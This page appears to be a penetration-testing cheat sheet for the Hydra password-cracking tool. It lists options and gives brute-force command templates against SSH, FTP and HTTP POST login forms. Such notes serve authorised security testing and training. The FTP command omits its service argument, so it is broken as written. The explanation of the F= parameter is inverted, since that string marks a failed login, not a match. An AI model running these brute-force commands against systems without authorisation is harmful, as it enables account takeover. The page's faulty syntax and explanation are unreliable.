CtrlK

Pentest Notes / Exploitation / Password Cracking

Hydra

Options

OptionDescription
-lsingle username
-Lusername file
-psingle password
-Ppassword file
-tsets the number of threads to spawn
-VVerbose output

SSH Bruteforce

hydra -l [username] -P [password_file] [MACHINE_IP] ssh

FTP Bruteforce

hydra -l [username] -P [password_file] [MACHINE_IP]

HTTP POST Form Bruteforce

hydra -l [username] -P [password_file] [MACHINE_IP] http-post-form "/:username=^USER^&password=^PASS^:F=[message_to_check_against]" -V
F= whatever is present here will be checked. If the response contains this, it's considered a valid match.